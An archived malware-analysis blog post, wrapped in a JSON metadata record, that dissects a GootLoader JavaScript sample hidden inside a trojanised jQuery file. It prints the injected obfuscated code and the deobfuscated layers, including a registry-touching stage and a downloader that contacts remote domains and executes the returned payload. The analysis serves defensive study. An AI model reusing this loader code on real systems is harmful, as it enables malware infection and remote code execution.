{
	"id": "bf323d93-f2ef-4b20-af7a-f1c2f19f2c32",
	"created_at": "2026-04-06T00:11:02.988608Z",
	"updated_at": "2026-04-10T03:20:40.047297Z",
	"deleted_at": null,
	"sha1_hash": "387d13b579a9a76f887c788d2e9886dbbc9761ef",
	"title": "Loading GootLoader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 945207,
	"plain_text": "Loading GootLoader\r\nBy Niranjan Hegde\r\nPublished: 2022-06-05 · Archived: 2026-04-05 23:14:14 UTC\r\nDisclaimer: Opinions expressed are solely my own. None of the ideas expressed in this blog post are shared, supported, or endorsed in any manner by my employer.\r\nIn this blog, I will be taking a look at the initial GootLoader sample (MD5: 4dd369b5e028beebe3aa5c980960c502, SHA256: c1029f0b5f4f6dfbe0fe656f075cbb5ccc2fc308087db21438d73394b75ea020). \r\nAvailable here: https://bazaar.abuse.ch/sample/c1029f0b5f4f6dfbe0fe656f075cbb5ccc2fc308087db21438d73394b75ea020/ \r\nThe sample is a JavaScript program meant to be executed on Windows using wscript.exe. \r\nOpening the sample in a text editor, it appears to be the jQuery library 3.6.0 (screenshot below).\r\nComparing the sample with jQuery 3.6.0 downloaded from https://code.jquery.com/jquery-3.6.0.js, differences can be observed. \r\nThe following lines show the code inserted to create the sample: \r\nout4(6670);\r\nfunction describe5(dance5, glass5, village9, list3) {\r\nreturn dance5.length;\r\nhttps://dinohacks.blogspot.com/2022/06/loading-gootloader.html\r\nPage 1 of 10\n\n}\r\nfunction out4(board94, wood9, nose8, seem0) {\r\njoin2 = [(2431)];\r\npresent4(join2);\r\n}\r\nfunction record9(is2, kill4, value8) {\r\nseat07(2187);\r\ncity0 = 1;\r\njoin2[5066387] = death3;\r\nphrase2 = city0;\r\nweight5 = phrase2 + city0 * phrase2 + city0;\r\n}\r\nfunction poem2(fast5, where3, had0, near0, choose7, made7, grand0) {\r\nspend1 = fast5;\r\nreturn spend1.substr(where3, had0);\r\n}\r\nfunction death3(first8, east3, black99) {\r\nthrough4 = \"OMemd\";\r\nshop4 = live4(back59(rub4), through4);\r\njoin2[6004566] = soil6;\r\n}\r\nfunction gone068(does7, boy1) {\r\ncome0 = 0;\r\nexperience7 = 'yerntr} ;C5(1.=q7te)cpi ti';\r\nthese9 = ' )ne}(oh)cct;alc e}s t;h)';\r\nexample7 = '.utt\\\"s\\\\pa )it=+\\\\s\\\"(=.(\\\"=\\\\+m S)(2h\\\\ \\\"e0fr\\\"0\\\\ci))S 
+\\\\}\\\"({';\r\nvoice6 = 'ti;Srf)Wi ((n(d g(nfsxei(.s (i.;\\\"n';\r\ntell2 = '\\\\-o)D1t\\\\O\\\"n)\\\"u\\\\ gs){z\\\\+\\\"? ((\\\"W\\\\[\\\"S\\\\)+cM()rAg\\\"i\\\\n\\\"p\\\\ipt)';\r\nsurprise1 = ']e) \\\"(e=\\\"p( +a)z\\\"rt \\\"s(;+e)]\\\"Ii\\\\\\\"\\\"(';\r\nsyllable42 = 'Sentctierle i{b pyfr';\r\nrather0 = ' (E=ntx rcpmuea.tjnrebderOEs enp{tv';\r\ncloud2 = 'v aelfsj(u]bJn[O4cpeothtsi{a o';\r\nmoney0 = 'yrgoktac=usrhtospn4o;c ';\r\nmodern2 = 'tto;.\\\"s\\\\Q\\\\sguReFirn\\\\t\\\\t\\\"(+h))\\\"g\\\";(i+ )l\\\"}R.E Sw\\\"}(';\r\nmove8 = '+()o\\\" EmRe\\\"C(l h,i\\\"a\\\"h r,w4Ce gou;hd(0';\r\nadd6 = 'a)((r\\\"+\\\\ \\\")\\\\sT\\\\I\\\"E Ne\\\"=\\\\S% (.\\\"x\\\\2+.';\r\nsleep3 = 't( \\\"a\\\\e\\\"M\\\\le %st=Ue/ S \\\"B\\\\{E ( \\\";\\\\x+)) ])+=z\\\\(\\\"[';\r\nmatch9 = 'o{nr; 7c6r-S0e7W=tJ ;u)=)r\\\" Zn\\\"m( + )S\\\"{St';\r\nworld9 = '\\\\)md%2 eU+;xS8)OE9ef\\\",\\\\(s2)\\\\l\\\"+(a@(]f\\\\\\\"\\\"\\\\) +R\\\\,\\\"DBBr';\r\nice3 = 'o)aineers(roehCnTc.mettexapntcit;}rS c';\r\ncame7 = '\\\")(n[+9ir3ett0tle)lu ;{s ';\r\nsheet4 = ' (\\\" \\\\+;vl)eal\\\\s\\\"\\\"r\\\\Wl )\\\\a\\\")xf(. ';\r\nwall1 = '(i+k)p\\\"aUt\\\"-(.+g)s\\\"nCl_iYe\\\"p(e+p';\r\nsign9 = 'w+ )w\\\"eU\\\\_\\\"\\\"l(,+s)\\\\\\\"\\\"TeNeE \\\"d({+.) 
\\\"lRW\\\"l(S+e)c\\\"uRr\\\"t';\r\nlife1 = '\\\" (r+))i\\\"3_n\\\" (g+\u003c).\\\" Gf\\\"z(r';\r\nspeed7 = 'WrSccSrWi p=t .9srleetetpe(l2;26973912';\r\nheat1 = 'n+k)t\\\"ur(W.gq\\\"o(,+c)1\\\".e0Rg';\r\nbook6 = ')p\\\"oE(Kh\\\"1(s+2)e\\\"3Hv\\\"4(i 5=l ';\r\nshore0 = '(1+.\\\\7\\\\m)3d \\\\5\\\"{{8Sy21Mr}\\\"\\\\\\\\\\\"t);( /}(\\'g(t2,ec';\r\nmeant6 = ' \\\"P\\\\xHTR.+TDr)\\\\\\\"\\\"\\\\e\\\"(\\\\p)+/l+)/a(\\\\\\\"\\\"\\\\c\\\"H\\\\e(LN(+MS\\\\)\\\"\\\"\\\\\\\\\\\"\\\"@\\\\()\\\\:\\\"+';\r\nwe6 = '\\\"+\\\\t+\\\\)\\\"\\\"\\\\\\\\\\\"+@=((\\\\x\\\"\\\"+\\\\,q)N l\\\\S\\\"p0\\\"s\\\\)yb))t\\\\+\\\"m=((p=\\\"+';\r\nserve7 = '(w+()\\\\\\\"\\\"ase,R)\\\"\\\\(\\\"+()t\\\")gee;Rn\\\" (.[W9gr';\r\nround4 = '+s+()pB\\\"\\\\\\\\\\\"t+DX\\\"\\\\\\\\\\\"Or(@\\\"e\\\\\\\\+\\\")\\\\)\\\"+,\\\"(\\\\\\\\(\\\"t+\\\"\\\\\\\\\\\"h)M)\\\"\\\\\\\\\\\"A;(v\\\" \\\\r v)\\\\,\\\"+';\r\nstraight4 = 'W \\\"\\'()t)c(e)j;b}Oceattacehr(Ce.)t{p}i';\r\npast6 = '5=1n5m0n)l;yxcbdnmaeqMgO';\r\nnoun59 = '\\\\(%2pm\\\"3\\\\o.2)dt3)ns2 a\\\")\\\\r!;(.= +h })';\r\nhurry2 = 'rh.+t\\\"s\\\\S(l(o\\\"e\\\\t+eI.)pN)\\\"(';\r\nrock9 = 'n4oeigpulh4(.][)w\\\"3dw\\\"]';\r\nhas8 = ')L)r)\\\\\\\"\\\"\\\\e (Gp{+\\\"l\\\\)Ba(\\\\=\\\"(cBMne+Xe(\\\"\\\\\\\\\\\"p/4(o';\r\ncontrol8 = ')4.e;gwu hw;})w\\\" l\\\\l\\\"ezh[S+. 
t+p=i;r c}SH';\r\ncertain87 = add6 + has8 + shore0 + cloud2 + experience7;\r\nfamily4 = match9 + life1 + move8;\r\nlarge7 = speed7 + past6 + money0;\r\nhit1 = sleep3 + meant6 + round4;\r\nfeet8 = we6 + tell2 + hurry2 + noun59;\r\nfresh3 = rock9 + serve7 + syllable42 + modern2 + sign9;\r\nshoe8 = surprise1 + heat1 + came7 + these9;\r\nbat8 = wall1 + book6;\r\nspecial8 = control8 + straight4;\r\nstead8 = example7 + sheet4 + rather0 + ice3 + voice6 + world9;\r\nrub4 = stead8 + feet8 + hit1 + certain87 + family4 + shoe8 + fresh3 + bat8 + special8 + large7;\r\njoin2[4833602] = record9;\r\nseat07(6030);\r\n}\r\nfunction vowel8(well3, poor4, view87, hill8) {\r\nreturn well3 % (weight5 - phrase2);\r\n}\r\nfunction visit0(white2, course9, except1, include76, stop4, insect9) {\r\nif (vowel8(except1)) have2 = white2 + course9;\r\nelse have2 = course9 + white2;\r\nreturn have2;\r\n}\r\nfunction soil6(was2, fell4, noise8, broke48) {\r\njoin2[6904665] = law1;\r\nshop4[weight5] = gone068[shop4[come0]];\r\n}\r\nfunction present4() {\r\nslave2 = back59;\r\nat9 = 4543;\r\nseat07(80947);\r\nwhile (gone068 = gone068) {\r\ntry {\r\njoin2[at9](at9);\r\n} catch (egg4) {\r\njoin2[2120844] = gone068;\r\n}\r\nat9++\r\n}\r\n}\r\nfunction trouble8(coast6, similar7, push89, both2) {\r\nreturn poem2(coast6, similar7, city0);\r\n}\r\nfunction law1(glad6, drink7, order05, hour8) {\r\nshop4[weight5](shop4[phrase2])(join2);\r\n}\r\nfunction seat07(sugar9, spell0, stay1, inch6, cow2) {\r\ndry1 = 69;\r\nwhile (dry1 \u003c (sugar9 * 4652)) {\r\ndry1++\r\n}\r\n}\r\nfunction live4(car6, particular4, tone0, why6, yard09, cotton8) {\r\ndesign8 = [];\r\nbear6 = come0;\r\nbegin4 = describe5(particular4);\r\nfor (rain9 = come0; rain9 \u003c= describe5(car6) - begin4; rain9++) {\r\nif (poem2(car6, rain9, begin4) == particular4) 
{\r\ndesign8[describe5(design8)] = poem2(car6, bear6, rain9 - bear6);\r\nbear6 = rain9 + begin4;\r\n}\r\n}\r\ndesign8[describe5(design8)] = poem2(car6, bear6);\r\nreturn design8;\r\n}\r\nfunction back59(took3) {\r\nheld8 = come0;\r\nwrote0 = \"\";\r\nwhile (held8 \u003c 2341) {\r\noil9 = trouble8(took3, held8);\r\nwrote0 = visit0(wrote0, oil9, held8);\r\nheld8++;\r\n}\r\nreturn wrote0;\r\n}\r\nOne important thing to mention about JavaScript: if a variable is declared without a keyword such as var, it is treated as a global variable. \r\nAfter reading the code, the following points can be observed: \r\nFunction seat07() increments a variable in a loop. The incremented variable is not referenced anywhere else in the code. This is most likely done to increase the execution time so that the sample exceeds a sandbox's analysis timeout and evades detection. Commenting out the function would speed up execution.\r\nFunction gone068() contains the obfuscated string, which is likely deobfuscated and executed. Generally, a deobfuscated string would require one of the following to be executed:\r\neval()\r\nthe Function constructor \r\nthe window object  \r\nIt would be interesting to see how the deobfuscated string is executed in this sample.\r\nFunctions law1() and present4() are quite interesting because they access array elements and call through them. They could be used to call the deobfuscation routine and execute the deobfuscated string. 
\r\nAfter adding breakpoints and running the program in a JavaScript debugger, the first layer of GootLoader becomes clear: \r\nfunction anonymous() {\r\ncylnmn = 2976;\r\nletter9 = WScript.CreateObject(\"WScript.Shell\");\r\nhuge4 = (\"H\") + (\"KE\") + (\"Y_C\") + (\"U\") + (\"R\") + (\"R\") + (\"ENT\") + (\"_U\") + (\"SER\") + (\"\") + \"\\\\rFRg\\\\\";\r\ntry {\r\nletter9[(\"Reg\") + (\"Rea\") + (\"d\")](huge4);\r\n} catch (e) {\r\nletter9[(\"Re\") + (\"gWr\") + (\"i\") + (\"t\") + (\"e\")](huge4, \"\", (\"RE\") + (\"G\") + (\"_\") + (\"S\") + (\"Z\"));\r\nJ = 70 - 67;\r\nnotice7 = 15;\r\n}\r\ntry {\r\nshop4[J](slave2('} ;t\\\"r1y8{5 3m7.1o4p\\\"e+nB(=(B\\\"{G \\\")))+\\\"(%\\\"NEIT\\\"\\\"()+,) \\\"(A\\\"Mh\\\"t(\\\"+))+\\\"\r\n(O\\\"Dt\\\"p(s+:)\\\"\\\")S+N(\\\"\\\"(/+/)\\\"\\\")D+RH\\\"[(z+])+\\\"(E\\\"S/Ut%e\\\"\\\"() +=(!\\\" s)t).\\\"p%\\\"N)I+\\\"\r\n((\\\"+h)p\\\"\\\"A)M+\\\"\\\"(?+z)g\\\"nOtDo\\\"p(m+t)y\\\"pSlNq\\\"x(=+\\\")+\\\"BD,R \\\"f(a+l)s\\\"eE)S;U %m\\\".(s(esngdn(i)r;t\r\nS}tcnaetmcnho(rei)v{n ErdentauprxnE .f)a)l\\\"slel;\\\" (}+ )i\\\"fe h(Sm\\\".(s+t)a\\\"t.utsp i=\\\"=(=+ )2\\\"0r0c)S \\\"{(\r\n+v)a\\\"rW \\\"x( (=t cme.jrbeOseptoanesreCT.etxpti;r ciSfW (( (fxi. i;n)d2e+x8O9f,(2\\\"(@]\\\")+\\\"Br+t\\\"\\\"@(\\\"+,)\r\n\\\"0s)b)\\\"=(=+-)1\\\")u s{\\\" (W[S)c(rginpitr.tsSloete.p)((2m3o2d3n2a)r;. h}t aeMl s=e B{ ;x) )=\\\"\r\nPxT.Tr\\\"e(p+l)a\\\"cHeL(M\\\"\\\"@(\\\"++)B\\\"+X\\\"r@e\\\"\\\",(\\\"+\\\"))\\\";v rv\\\"a(r+ )s\\\" e=S\r\n.x2.Lr\\\"e(p+l)a\\\"cMeX(\\\"/((+\\\\)d\\\"{S2M}\\\")(/(gt,c efjubnOcettiaoenr C(.qt)p i{r crSeWt u=r nm S{t r)i3n g\u003c.\r\nfzr(o meClhiahrwC o;d0e (=p azr s;e]I\\\"nktu(.qo,c1.0g)n+i3t0l)u;s n}o)c;l esthnoipl4.[w3w]w(\\\"s,)\\\"(t)e;n\r\n.WgSncireibpfto.sQsueintt(h)g;i l}. w}w we\\\"l,s\\\"ee d{. 
lWlSecurtikpat-.gsnliepeppo(h1s2e3v4i5l).;w w}w\r\n\\\"z[+ +=; }H '))();\r\n} catch (e) {}\r\nWScript.sleep(229315150);\r\nxbnaqgygka = shop4;\r\n}\r\nThe following points can be observed:\r\nDeobfuscated strings are executed using the Function constructor.\r\nIt contains an obfuscated string which needs to be deobfuscated. \r\nIt also seems to access the registry under HKEY_CURRENT_USER.\r\nDeobfuscating the string in the first layer reveals the second layer of GootLoader: \r\nH = [\"www.-------.de\", \"www.----------.net\", \"www.---------.co.uk\"];\r\nz = 0;\r\nwhile (z \u003c 3) {\r\nm = WScript.CreateObject((\"MS\") + (\"XM\") + (\"L2.Se\") + (\"rv\") + (\"erX\") + (\"MLH\") + (\"TTP\"));\r\nB = Math.random().toString()[(\"su\") + (\"bs\") + (\"tr\")](2, 98 + 2);\r\nif (WScript.CreateObject((\"W\") + (\"Scr\") + (\"ipt.\") + (\"She\") + (\"ll\")).ExpandEnvironmentStrings((\"%USE\") +\r\n(\"RD\") + (\"NS\") + (\"DO\") + (\"MA\") + (\"IN%\")) != (\"%USE\") + (\"RD\") + (\"NS\") + (\"DO\") + (\"MA\") +\r\n(\"IN%\")) {\r\nB = B + \"4173581\";\r\n}\r\ntry {\r\nm.open((\"G\") + (\"ET\"), (\"ht\") + (\"tps:\") + (\"//\") + H[z] + (\"/te\") + (\"st.p\") + (\"hp\") + \"?zgntopmtyplqx=\" + B,\r\nfalse);\r\nm.send();\r\n} catch (e) {\r\nreturn false;\r\n}\r\nif (m.status === 200) {\r\nvar x = m.responseText;\r\nif ((x.indexOf(\"@\" + B + \"@\", 0)) == -1) {\r\nWScript.sleep(23232);\r\n} else {\r\nx = x.replace(\"@\" + B + \"@\", \"\");\r\nvar s = x.replace(/(\\d{2})/g, function (q) {\r\nreturn String.fromCharCode(parseInt(q, 10) + 30);\r\n});\r\nshop4[3](s)();\r\nWScript.Quit();\r\n}\r\n} else {\r\nWScript.sleep(12345);\r\n}\r\nz++;\r\n}\r\nThe following points can be noted: \r\nIt checks whether the environment variable USERDNSDOMAIN is set, which would indicate that the system is part of an Active Directory (AD) domain. 
\r\nIf the Active Directory variable is set, it appends the string \"4173581\" to the parameter value in its requests.\r\nThe C2 communication would look something like this:\r\nGET request to the server with path: test.php?zgntopmtyplqx=\r\nThe parameter will be \u003crandom value\u003e4173581 if the computer is part of AD, otherwise only \u003crandom value\u003e. \r\nIf the HTTP response status code is anything other than 200, it sleeps for 12345 milliseconds and tries the next domain. \r\nIf the HTTP response status code is 200, it looks for the string \"@\u003cparameter value sent\u003e@\" in the response text. \r\nIf it is not present, it sleeps for 23232 milliseconds. \r\nIf it is present, it does the following:\r\nRemoves the string \"@\u003cparameter value sent\u003e@\" from the response text. \r\nThe response text is likely a series of numbers, which are parsed as integers and converted to ASCII strings, which are then deobfuscated. \r\nIf you are interested in reading more about this campaign, see the following blogs:\r\nhttps://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/ \r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nHave a nice day! \r\nSource: https://dinohacks.blogspot.com/2022/06/loading-gootloader.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://dinohacks.blogspot.com/2022/06/loading-gootloader.html"
	],
	"report_names": [
		"loading-gootloader.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434262,
	"ts_updated_at": 1775791240,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/387d13b579a9a76f887c788d2e9886dbbc9761ef.pdf",
		"text": "https://archive.orkl.eu/387d13b579a9a76f887c788d2e9886dbbc9761ef.txt",
		"img": "https://archive.orkl.eu/387d13b579a9a76f887c788d2e9886dbbc9761ef.jpg"
	}
}